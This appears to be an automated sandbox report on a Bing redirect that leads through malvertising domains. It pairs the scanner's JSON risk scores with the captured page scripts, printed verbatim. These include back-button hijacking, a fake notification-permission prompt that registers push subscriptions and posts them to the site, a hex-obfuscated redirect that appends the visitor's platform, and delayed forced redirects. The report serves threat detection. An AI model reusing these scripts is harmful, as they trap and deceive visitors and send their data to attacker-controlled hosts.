Windows Analysis Report
https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://www.bing.com

{
    "risk_score": 8,
    "reasoning": "This script exhibits high-risk behavior by redirecting the user to a suspicious domain (authmycookie.com) with an obfuscated URL parameter. This is a strong indicator of potential malicious activity, such as credential harvesting or other types of attacks."
}

   window.location = "https://authmycookie.com/rt4.php?r3=CRA6RBIOEBoKTENdFwoWHU9GXQBcXVdeVkIDBQxYX19QXFEcU19SXVo6WEAbDwtQCQAcUwMICx8MAVcHD0U%3D&u=r2_40408b87-d092-48a7-8786-bc9345872096";
   

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the aggressive manipulation of the browser history further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent."
}

!function(o){try{for(var t=10;0<=t;--t)history.pushState({},"Loading","#"+t);onpopstate=function(t){t.state&&(location=o)},onhashchange=function(){location=o}}catch(t){}}("\/?utm_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm_campaign=cid%253A11006&cid=11006-14815-202501092256198809&1=&2=&3=&4=&5=&puid=7458007059351470183&fl=1");document.addEventListener("click",function(t){t=t.target;"A"===t.tagName&&"_blank"===t.target&&setTimeout(function(){try{history.replaceState(null,null,"\/?utm_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm_campaign=cid%253A11006&cid=11006-14815-202501092256198809&1=&2=&3=&4=&5=&puid=7458007059351470183&fl=1")}catch(t){}location="\/?utm_medium=9eb2bcdc89976429bc64127056a4a9d5d3a2b57a&utm_campaign=cid%253A11006&cid=11006-14815-202501092256198809&1=&2=&3=&4=&5=&puid=7458007059351470183&fl=2"},1e3)});

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It appears to be a malicious script designed to collect user data and redirect users to a potentially harmful website."
}

var pm_appKey = "BHR8bZ93X3YNBNQcN_dGRYtnWqdsJXR2bXqq3vhfBL1TpfZqrGKXYxATKGNHa25HyaghKK8ZiaFXbIgJqY2624A"; var pm_denyAction = function () {location.replace("https:\/\/gounrical.com\/click.php?key=ls9yc3ivpkcbp3geh7vr&cid=M7458007059351470183&pad=27376&campaign=054d44&pid=27376-c0af779z");}; var pm_tag = 'default'; var pm_allowAction = function () {location.replace("https:\/\/gounrical.com\/click.php?key=ls9yc3ivpkcbp3geh7vr&cid=M7458007059351470183&pad=27376&campaign=054d44&pid=27376-c0af779z");};!function(a,d,e,i,r){t=(t=d.currentScript)&&t.src||d.URL;var t,o=(t=/\/\/([^/?]+)/.exec(t))?t[1]:"";function s(){var t=a.pm_denyAction;t&&t()}function n(n){var t=new XMLHttpRequest;t.onreadystatechange=function(){var t,e;4==this.readyState&&(t=n.endpoint,e=a.pm_allowAction)&&e(t)},t.open("POST","https://"+o+"/subscription.php",!0),t.setRequestHeader("Content-type","application/json"),t.send(JSON.stringify({sub:n.toJSON(),language:navigator.language,token:a.pm_token,tag:r||a.pm_tag,utm_term:i,pid:e||a.pm_pid}))}function c(){var t=a.pm_sw||"/sw.js";Promise.all([a.Notification.requestPermission(),navigator.serviceWorker.register(t+(t.match(/\?/)?"&":"?")+"v="+(new Date).valueOf())]).then(function(t){if("granted"!==t[0])throw Error("permission denied");var e=t[1].pushManager;return e.getSubscription().then(function(t){return t||e.subscribe({userVisibleOnly:!0,applicationServerKey:new Uint8Array([4,116,124,109,159,119,95,118,13,4,212,28,55,247,70,69,139,103,90,167,108,37,116,118,109,122,170,222,248,95,4,189,83,165,246,106,172,98,151,99,16,19,40,99,71,107,110,71,201,168,33,40,175,25,137,161,87,108,136,9,169,141,186,219,128])})})}).then(n).catch(s)}d.onreadystatechange=function(){"complete"===d.readyState&&setTimeout(function(){if(a.pm_enablePrompt&&"granted"!==a.Notification.permission)t="We would like to show you notifications for the latest news and updates.",e="Allow",n="No Thanks",i="affDenPBtn",r="affAccPBtn",o="fauxDia",p="",a.pm_promptDenyBtnText&&(n=a.pm_promptDenyBtnText),a.pm_promptAcceptBtnText&&(e=a.pm_promptAcceptBtnText),a.pm_promptText&&(t=a.pm_promptText),a.pm_promptHideDeny||(p='<div id="'+i+'" style="float:right;cursor:pointer;display:inline-block;padding: 10px 25px; margin-left:7px;color:#4285F4;">'+n+"</div>"),n='<div id="'+o+'" style="width:500px;max-width:100%;font-family:\'Arial\',Helvetica,sans-serif;font-size:14px;box-sizing:border-box;position:absolute;top:0;z-index:999999;left:50%;transform:translateX(-50%);padding:25px;background:white;color:#242424;border-bottom-left-radius:4px;border-bottom-right-radius:4px;box-shadow: 0px 0px 6px -3px rgba(0, 0, 0, 0.2), 0px 0px 14px 1px rgba(0, 0, 0, 0.14), 0px 0px 18px 3px rgba(0, 0, 0, 0.12) !important;"><p style="margin:0 0 30px 0;padding:0;">'+t+'</p><div id="'+r+'" style="background:#4285F4;border-radius:3px;color:white;float:right;cursor:pointer;display:inline-block;padding: 10px 25px; margin-left:7px;">'+e+"</div>"+p+'<div class="clear:both;"></div></div>',d.body.insertAdjacentHTML("beforeend",n),a.pm_promptHideDeny||d.getElementById(i).addEventListener("click",function(){d.getElementById(o).remove(),s()}),d.getElementById(r).addEventListener("click",function(){d.getElementById(o).remove(),c()});else try{c()}catch(t){s()}var t,e,n,i,r,o,p},a.pm_delay||1)}}(window,document,"27376-c0af779z","7458007059351470183","");

{
    "risk_score": 7,
    "reasoning": "The script contains a high-risk indicator of redirecting the user to an untrusted, suspicious domain, which is a common tactic used in phishing and malware attacks. This behavior scores 3 points. Additionally, the URL appears to be obfuscated, which adds another 3 points. While the intent is not explicitly malicious, the combination of these factors suggests a medium-to-high risk level that warrants further investigation."
}

   window.location = "https://breakpoint.goalkedf.cfd/help/?32171731928960";
   

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of obfuscated code and the redirection to a domain that appears to be associated with malicious activity (fly.asssing.shop) further increase the risk. Overall, this script demonstrates a high level of malicious intent and should be treated with caution."
}

!function(){var t=0;setInterval(function(){document.body.firstChild.style.opacity=.5+Math.abs(50-t++%100)/100},10)}();location="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x66\x6c\x79\x2e\x61\x73\x73\x73\x69\x6e\x67\x2e\x73\x68\x6f\x70\x2f\x3f\x75\x74\x6d\x5f\x74\x65\x72\x6d\x3d\x37\x34\x35\x38\x30\x30\x37\x30\x35\x39\x33\x35\x31\x34\x37\x30\x31\x38\x33&tid="+function(t,o,r){for(;r<t.length;)o+=t.charCodeAt(r++).toString(16);return o}(navigator.platform,"",0);

{
    "risk_score": 6,
    "reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, redirects to a suspicious domain, and aggressive DOM manipulation. While the script appears to have some legitimate functionality related to analytics and referrer tracking, the use of obfuscated URLs and the potential for redirecting users to an unrelated domain raises concerns and requires further review."
}

//<![CDATA[
      var s = false;
      function l() {
        setTimeout(f, 10000);
        if (document.referrer) {
          try {
            var pm = /(^|&|\?)px=([^&]*)(&|$)/i;
            var px = window.location.href.match(pm);
            var rs = document.referrer;
            if (px != null) {
              if (rs.match(pm))
                rs = rs.replace(pm, "$1px=" + px[2] + "$3");
              else if (rs.indexOf("?") != -1)
                rs = rs + "&px=" + px[2];
              else
                rs = rs + "?px=" + px[2];
            }
            history.replaceState({}, "Bing", rs);
            window.addEventListener("pageshow", function(e) { if (e.persisted || (typeof window.performance != "undefined" && window.performance.navigation.type === 2)) window.location.reload(); });
            s = true;
            setTimeout(r, 10);
            return;
          } catch (e) {}
        }
        r();
      }
      function r() {
        var u = "https://www.bing.com/alink/link?url=https%3a%2f%2fwww.alphasurance.com%2f&source=serp-local&h=A5gAIcTickWldG%2btQp%2fcGgCvwNh8RfcEppBgTLiM8KM%3d&p=lw_tp&ig=A9EE2293BC2F48209F1924AA9D81526F&ypid=YN873x17866710165154429074";
        if (s)
          window.location.href = u;
        else
          window.location.replace(u);
      }
      function f() {
        document.getElementById("fb").style.display = "block";
      }
      //  
    

{
    "risk_score": 8,
    "reasoning": "The script uses a setTimeout function to redirect the user to an unknown domain (gounrical.com) after a 4-second delay, which is a high-risk indicator of potential malicious behavior. The URL contains obfuscated parameters, further increasing the suspicion of this script's intent."
}

setTimeout(function () {location.replace("https:\/\/gounrical.com\/click.php?key=ls9yc3ivpkcbp3geh7vr&cid=M7458007059351470183&pad=27376&campaign=054d44&pid=27376-c0af779z")}, 4000);

{
  "contains_trigger_text": true,
  "trigger_text": "Click \"Allow\" To Continue",
  "prominent_button_name": "Allow",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://fly.asssing.shop

{
  "brands": "unknown"
}

{
    "risk_score": 7,
    "reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated URLs. The script sends user data to an unknown domain via AJAX requests and then redirects the user to a Chrome Web Store page, which could be a phishing attempt. While the script claims to be related to a Chrome extension, the overall behavior is highly suspicious and indicates a potential security risk."
}

$(document).ready(function () {
            // Function to open the Chrome Web Store and send a notification
            function openInstall() {
                subId = "0";
                zoneId = "";
                guid = "48FAF65B00874A0E86DDCD458A75CA04";

                $.ajax({
                    url: "/click.php?lp=1&uclick=1m8phq"+subId+"&zoneid="+zoneId+"&guid="+guid,
                    xhrFields: {
                        withCredentials: true
                    },
                    crossDomain: true,
                    success: function() {
                        window.location.href = 
						//{"https://chromewebstore.google.com/detail/owebster-search-20/ndlcgjaacmkkapeepnofmmiinlkcbjfb?a=lp.owebsearch.comp=3501ver=399}";
						"/click.php?lp=1&uclick=1m8phq";
						//"https://chromewebstore.google.com/detail/owebster-search-20/ndlcgjaacmkkapeepnofmmiinlkcbjfb?a=lp.owebsearch.comp=3501ver=399";

                    }
                });
            }

            // Attach the openInstall function to the "Continue" button click event
            $("#continue").on("click", function () {
                openInstall();
            });
        });
    

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily consists of utility functions and object manipulations typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk."
}

/*! jQuery v3.6.4 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.4",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:v}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,y,s,c,v,S="s

{
"contains_trigger_text": true,
"trigger_text": "Telepary is a new way to watch Streaming with your friends online",
"prominent_button_name": "Continue",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://gounrical.com

{
  "brands": [
    "Teleparity"
  ]
}

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a simple assignment of the current timestamp to a global variable `_hst`. This behavior is common for analytics or logging purposes and does not demonstrate any high-risk indicators."
}

window._hst=Date.now();

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://www.google.com

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}

{
  "brands": [
    "Google"
  ]
}

{
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://asssing.shop